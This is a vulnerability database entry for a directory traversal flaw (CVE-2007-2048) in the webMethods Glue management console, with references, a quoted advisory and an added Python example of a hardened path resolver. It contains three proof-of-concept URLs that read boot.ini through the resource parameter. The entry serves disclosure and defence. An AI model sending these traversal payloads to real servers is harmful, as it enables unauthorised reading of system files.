webMethods Glue 'Console' Directory Traversal Vulnerability

Vulnerability ID: 1112680    Vulnerability type: Path traversal
Published: 2007-04-11    Updated: 2007-05-07
CVE: CVE-2007-2048    CNNVD-ID: CNNVD-200704-260
Platform: Windows    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/29843
https://www.securityfocus.com/bid/23423
https://cxsecurity.com/issue/WLB-2007040096
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-260
|Vulnerability details
The /console endpoint of the webMethods Glue management console has a directory traversal vulnerability. A remote attacker can read arbitrary system files by supplying ".." sequences in the resource parameter.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/23423/info

webMethods Glue is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer with the privileges of the affected application. Information obtained may aid in further attacks.

This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable. 

http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini
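The three probe URLs above cover the three ways a `resource` value can escape a document root on Windows: a relative `..` walk, a root-relative path beginning with a backslash, and a drive-qualified absolute path. The following is an added example, not webMethods code, of how a resolver for such a parameter should canonicalise and contain the value so that all three forms are refused; the console root directory and the function names are assumptions for illustration.

```python
# Added example, not webMethods code: a hardened resolver for a "resource"
# query parameter, written to show why the three probe URLs quoted in the
# advisory above must be rejected. The console root path is an assumption.
from typing import Optional
from urllib.parse import parse_qs, urlsplit
import ntpath
import posixpath

CONSOLE_ROOT = "C:/glue/console"  # assumed document root served by /console


def resolve_resource(root: str, resource: str) -> Optional[str]:
    """Map `resource` to a canonical path under `root`.

    Returns None when the request would leave the root: any ".." component,
    an absolute path ("\\boot.ini") or a drive-qualified path ("c:\\boot.ini").
    """
    # The product runs on Windows, where backslash is a separator too, so fold
    # both separator styles before any other check.
    candidate = resource.replace("\\", "/")
    # Reject absolute and drive-qualified names before joining: a naive join
    # would otherwise discard `root` entirely for these inputs.
    if candidate.startswith("/") or ntpath.splitdrive(candidate)[0]:
        return None
    # Reject any ".." component outright rather than trying to "clean" it.
    if any(part == ".." for part in candidate.split("/")):
        return None
    joined = posixpath.normpath(posixpath.join(root, candidate))
    # Final containment check on the normalised result.
    base = root.rstrip("/")
    if joined != base and not joined.startswith(base + "/"):
        return None
    return joined


def resolve_from_url(url: str) -> Optional[str]:
    """Extract the resource parameter (percent-decoded, as the server would
    see it) and resolve it; exactly one value is required."""
    values = parse_qs(urlsplit(url).query).get("resource", [])
    if len(values) != 1:
        return None
    return resolve_resource(CONSOLE_ROOT, values[0])


if __name__ == "__main__":
    # Constructed inputs: the three probes from the advisory plus one legitimate name.
    for probe in ("../../../boot.ini", "\\boot.ini", "c:\\boot.ini", "css/main.css"):
        print(f"{probe!r:24} -> {resolve_resource(CONSOLE_ROOT, probe)}")
```

The order of the checks matters: the absolute and drive-letter cases are caught before joining, because joining `root` with an absolute path silently replaces `root`; the `..` check is applied to the decoded value the server actually sees, so percent-encoded variants are caught by the same test; and the final prefix comparison on the normalised path is kept as a second line of defence should a future separator or encoding slip past the earlier checks.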
|Affected products
webMethods / webMethods Glue 6.5.1
webMethods / webMethods Glue 5.0
webMethods / webMethods Glue 4.0
webMethods / webMethods Glue
|References

Source: VUPEN
Name: ADV-2007-1363
Link: http://www.frsirt.com/english/advisories/2007/1363
Source: BID
Name: 23423
Link: http://www.securityfocus.com/bid/23423
Source: BUGTRAQ
Name: 20070507 Updated: webMethods Security Advisory: Glue console directory traversal vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/467873/30/6720/threaded
Source: BUGTRAQ
Name: 20070411 webMethods Glue Management Console Directory Traversal
Link: http://www.securityfocus.com/archive/1/archive/1/465332/100/0/threaded
Source: MISC
Name: http://www.aushack.com/advisories/200704-webmethods.txt
Link: http://www.aushack.com/advisories/200704-webmethods.txt
Source: SECTRACK
Name: 1017926
Link: http://www.securitytracker.com/id?1017926
Source: BUGTRAQ
Name: 20070417 webMethods Security Advisory: Glue console directory traversal vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/465993/100/0/threaded
Source: SREASON
Name: 2589
Link: http://securityreason.com/securityalert/2589
Source: SECUNIA
Name: 24933
Link: http://secunia.com/advisories/24933